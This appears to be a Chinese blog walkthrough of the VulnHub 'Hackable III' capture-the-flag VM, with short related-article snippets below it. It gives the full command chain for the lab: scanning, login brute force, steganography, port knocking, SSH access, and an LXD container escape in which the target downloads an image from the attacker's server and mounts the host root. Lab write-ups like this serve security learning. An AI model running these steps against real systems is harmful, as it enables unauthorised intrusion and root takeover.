VulnHub日记(三): Hackable 3

最新推荐文章于 2023-05-24 12:20:27 发布
最新推荐文章于 2023-05-24 12:20:27 发布
阅读量530 收藏 1
点赞数 2
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/119411475
版权

靶机介绍

中等难度的ctf虚拟机

参考链接:

参考博客:https://nepcodex.com/2021/07/hackable-iii-walkthrough-vulnhub/

虚拟机链接:https://www.vulnhub.com/entry/hackable-iii,720/

lxd,lxc提权:https://www.freebuf.com/articles/system/216803.html

开始练习

本机ip:192.168.56.102

nmap扫出目的机ip:192.168.56.107

nmap -sS 192.168.56.0/24

扫描开启服务

nmap -A -p- 192.168.56.107

扫描目录

dirsearch -e txt,php,html,flag,asp,aspx,bak,jpg,img,htm  -r -u http://192.168.56.107

 

 

ssh为过滤状态,访问80端口,查看网页源码,发现提示,需要尝试上次日记中使用过的端口碰撞技术来解锁ssh端口,并且告诉老板approve .jpg(当时不太明白)

 

 

注释内容:
<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->

查看可访问的目录,发现字典,应该可以用于爆破登录,寻找登录入口

再次访问初始页面,查看源码,放大后发现隐藏的菜单按钮,打开登录页面,使用BP暴力破解用户名密码

 第一次用户名和密码都用字典,没有结果,想到可能是之前提示代码中的”jubiscleudo“是用户名,开始尝试

依旧没有结果,所以该字典应该是ssh的字典,但是发现登录后打开的是一个空的页面,查看原代码,发现是之前扫描到的”login.php“,基本动作就是连接数据库,从数据库中读取用户名密码信息,如果成功,就打开3.jpg,于是先下载3.jpg

查看之前扫描的目录,在”config.php“中发现数据库用户名密码等信息

结合两个代码,我们获取了mysql的数据库名称和用户名密码 ,这个页面再没有更多想法了,则尝试登录ssh,则需要端口序列来使用knock解锁22端口,就想到了之前没有用到的1.txt和2.txt,觉得这两个应该是端口序列

看了一眼大佬的提示,用base64编码解码1.ttxt,使用Brainfuck解码2.txt

echo MTAwMDA= | base64 -d

 Brainfuck的在线解码网站:http://ctf.ssleye.com/brain.html

 现在还缺少一个端口号,按照之前的文件名称想到了3.jpg,但是不知道怎么提取,于是查看提示,了解了这里使用了文件隐写,按照提示提取出端口,成功knock

steghide extract -sf 3.jpg
cat steganopayload148505.txt 

knock 192.168.56.107 1000 4444 65535
nmap -A -p- 192.168.56.107

 

使用之前注释里的用户名和获得的字典爆破

 得到用户名密码 

ssh -l jubiscleudo 192.168.56.107

查看user.txt

cat .user.txt

进入sql失败,也没有发现本用户有特殊权限,返回上级目录,发现新用户名hackable_3

cd ../
id
ls -al

逐个访问目录,在访问/var/www/html下有隐藏文件.back_config.php 

打开后得到hackable_3密码 

 

切换用户,查看id和用户目录文件

id
cd /home/hackable_3
ls -al

查看id后

发现可以利用lxd,lxc提权

本机下载Alpine镜像

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

生成.tar.gz文件,打开server服务,传输给目标机

python -m SimpleHTTPServer

目标机获取镜像,将其以镜像的形式添加进LXD了

wget http://192.168.56.102:8000/alpine-v3.8-x86_64-20210805_0417.tar.gz
lxc image import ./alpine-v3.8-x86_64-20210805_0417.tar.gz --alias myimage
lxc image list
#.tar.gz文件是根据时间生成的,需要根据自己情况更改名称  --alias 后的名称也可以自己定义

 初始化Container,否则在加载容器时会显示没有存储池

lxd init
一路回车

执行如下命令,成功提权

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

获取flag 

cd /mnt/root/root
ls -al
cat root.txt

 

总结

线索较多,第一次使用lxc,lxd提权,Brainfuck编码,又一次用到了knock解锁端口

Dawn_Xiiii
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackable7:可破解的来源#7
05-23
Hackable》杂志#7的来源和文件该存储库包含第七期存在的Arduino草图的来源: 使用的库是: DS1307RTC:通过Arduino IDE中的库管理器LiquidCrystal:默认安装时间和时间警报:通过Arduino IDE中的库管理器在...
VulnHub靶机_HACKABLE: III
学术渣渣的博客
08-31 582
文章目录靶机介绍渗透过程准备获取IP端口扫描 靶机介绍 下载地址: http://www.vulnhub.com/entry/hackable-iii,720/ 难度:中等 渗透过程 准备 将靶机下载下来,我这里使用的是virtualbox,下载的是.ova文件。下载之后用virtualbox打开,设置网络为桥接模式。 获取IP 使用arp-scan工具,我们得到靶机的IP为:192.168.1.104。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1
VulnHub靶场----Hackable_3
qq_61670993的博客
10-28 1697
小菜鸡一枚
vulnhub-HACKABLE: Hackable: III
qq_43006864的博客
04-29 477
Hackable: III 攻击机:kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 靶机:Hackable: III 信息收集: NMAP探测端口信息:nmap 192.168.1.1/24 nmap探测详细端口信息:nmap -sS -sV -A -p- 192.168.1.103 探测到了robots.txt。 ..
VulnHub靶场】Hackable: III
EC_Carrot的博客
11-08 1563
VulnHub靶机渗透测试
靶机渗透练习16-Hackable III
hirak0的博客
04-15 883
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackable-iii,720/ Description Focus on general concepts about CTF Difficulty: Medium This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.8 注:靶机与Kali的IP地址只
Hackable6:来源可破解 #6
06-08
Hackable 杂志 #6 的来源和文件 该存储库包含第六期出现的 Arduino 草图的来源: 使用的库是:
Hackable9:资料来源可入侵#9
04-28
Hackable》杂志#9的来源和文件 该存储库包含第九期的草图: WSmatrix44ok/ :电视模拟器的完整Arduino草图,其中.h包含使用FFMPEG从视频中提取的图像, script_images/go.sh :用于从包含用FFMPEG提取的图像...
Hackable8:可入侵的来源#8
05-11
Hackable》杂志#8的来源和文件该存储库包含Arduino草图以及第八期存在的其他文件(配置,PHP脚本等): AVR_C_arduino/ :Arduino IDE中“真实” C上的文章的C代码, chaudiere_Pi_Axelle_Ludovic/ :用于燃油...
XLE, XLE"hackable" 3D 游戏渲染引擎.zip
10-10
XLE, XLE"hackable" 3D 游戏渲染引擎 XLE Prototype 3D 游戏引擎XLE灵活模块化且功能强大。 它旨在与其他解决方案结合,并扩展为具有特殊案例需求的项目。起始点:开发博客:https://xlgames-inc.github.io技术文档...
Vulnhub_hackableII
qq_45434762的博客
07-02 474
主机信息kali:192.168.1.7 hackableII:192.168.1.8 信息收集通过nmap扫描目标主机发现开放了3个端口,并且ftp可匿名登录nmap -T4 -A -v...
HACKABLE: III实战演练
龙狼刺的博客
05-24 639
Hackable III
VulnHub_HACKABLE: II靶机
学术渣渣的博客
08-23 283
文章目录靶机介绍渗透过程ip地址扫描端口扫描访问ftp制作php反弹shell脚本上传脚本nc监听脚本中记录的端口访问脚本网站获取shell提权 靶机介绍 下载地址:https://www.vulnhub.com/entry/hackable-ii,711/ 难度:简单 渗透过程 ip地址扫描 我们通过设置桥接模式,能够用arp-scan搜索同一局域网中的活跃主机。这里,我们得到靶机的ip是192.168.1.106。 arp-scan -l 端口扫描 对靶机进行端口扫描,可以看到这里有三个端口:21,
VulnHub-hackableII
sanqin_的博客
07-04 348
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/hackable-ii,711/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 该靶机21端口开放ftp,22端口开放ssh,80端口开放http 访问http,是apache的默认页面,不过提示了使用dirb扫描 在扫描的同时用匿名用户查看一下ftp 匿名用户名:anonymous 密码:
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3077
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
VULNHUB靶机渗透——hackable2
aarong的博客
12-20 2044
前言 可能很多人在进行靶机渗透的时候会出现扫描不出靶机IP的情况,这里是靶机的网络配置没有设置好,设定跟你的虚拟网卡一致就可以了,具体参考这篇文章和这篇文章。 渗透过程 网络拓扑:攻击机和靶机同是NAT模式 (1)arp-scan -l扫描本地主机IP 这里根据MAC地址的不同判断出192.168.65.133为靶机IP地址 (2)Nmap扫描 nmap -A -T4 -p 1-65535 192.168.65.133 这里发现靶机开放了21 22 80三个端口,而且21端口是允许匿名登录的,等会直接
VulnHub靶场渗透实战-hackable3
随心所欲不逾矩
11-11 832
靶场环境:Virtualbox(最后总结出来:用新版本导入)网络模式:桥接。靶场难度:中等。结果思路总结:本节使用的工具和漏洞难度中等,涉及到CTF中的隐写术,Brainfuck解密。
vulnhub_HackathonCTF: 1
weixin_50698958的博客
11-06 460
靶机下载:点我 测试过程: 1、在本地启动靶场,设置网卡为VMnet8,自动获取IP,查看物理MAC 2、使用nmap扫描网段,找到IP为192.168.220.130 3、看到80端口开着,就尝试访问一下 报错,使用的是Apache服务器,版本2.4.7,百度一下存在Apache解析漏洞 4、使用御剑扫描一下后台目录,发现robots.txt 5、尝试访问一下robots.txt 发现base64加密内容 c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
vulnhub之HACKATHONCTF: 1
weixin_44537595的博客
11-05 636
靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/ 查看对方的主机mac地址 我们用我们的kali进行存活主机扫描 命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24 搜索到对方主机的ip地址为 192.168.25.84 3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt 命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt 4
报错Writable folder /var/www/html/DVWA/hackable/uploads/: No 和Writable folder /var/www/html/DVWA/config: No怎么办?
最新发布
07-25
3. 为这两个文件夹设置适当的权限。您可以使用以下命令来为这些文件夹添加写入权限: ``` sudo chmod -R 777 /var/www/html/DVWA/hackable/uploads/ sudo chmod -R 777 /var/www/html/DVWA/config ``` 注意:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值